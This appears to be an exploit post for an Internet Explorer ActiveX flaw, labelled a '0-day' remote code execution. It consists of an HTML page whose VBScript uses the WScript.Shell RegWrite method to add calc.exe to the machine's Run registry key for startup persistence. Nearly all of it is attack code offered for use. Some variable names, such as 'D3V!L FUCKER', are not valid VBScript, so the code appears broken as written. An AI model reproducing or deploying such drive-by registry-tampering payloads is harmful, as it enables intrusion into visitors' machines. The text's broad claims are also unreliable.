==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|

==============================================================================
#Exploit title:0-day Interner Explorer ActiveX remote code Execution 2 (insecure method)
#version: all versions
#Author:  [D3V!L FUCKER & germaya_x]
#special thanx: [for my best friend his0k4].
#Geetz [2] :[Sarbot511 ,thrid-devil ,ahwak2000].
#tested on : windows 7 , windows vista ,windows xp sp2
#n0te:you can use it by run it then restart the computer once it open you will show the calc.exe
==============================================================================
<html>
<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object>
<script language='vbscript'>

targetFile = "c:\WINDOWS\system32\wshom.ocx"
prototype  = "Sub RegWrite ( ByVal Name As String ,  ByRef Value As Variant ,  [ ByRef Type As Variant ] )"
memberName = "RegWrite"
progid     = "IWshRuntimeLibrary.IWshShell_Class"
argCount   = 3

D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
germaya_x="C:\WINDOWS\system32\calc.exe"
his0k4="REG_SZ"

target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4

</script>